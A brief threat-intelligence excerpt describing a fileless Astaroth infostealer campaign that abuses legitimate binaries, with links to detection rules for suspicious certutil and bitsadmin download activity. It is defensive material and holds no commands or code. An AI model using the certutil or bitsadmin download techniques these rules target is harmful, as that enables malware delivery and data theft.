Unlike past campaigns, files are not saved to the attacked system during the infection process, so it is rather difficult to detect infostealer with traditional security solutions. In February campaign distributing Astaroth malware, attackers misused legitimate binaries of security solutions to load its modules.
Rules to detect infection process
Suspicious Certutil Command by Florian Roth, juju4, keepwatch: https://tdm.socprime.com/tdm/info/1184/
Certutil.exe execution via Command Line or PowerShell by Eugene Nechiporenko, SOC Prime: https://tdm.socprime.com/tdm/info/1060/
Bitsadmin Download (Sysmon) by Michael Haag: https://tdm.socprime.com/tdm/info/1221/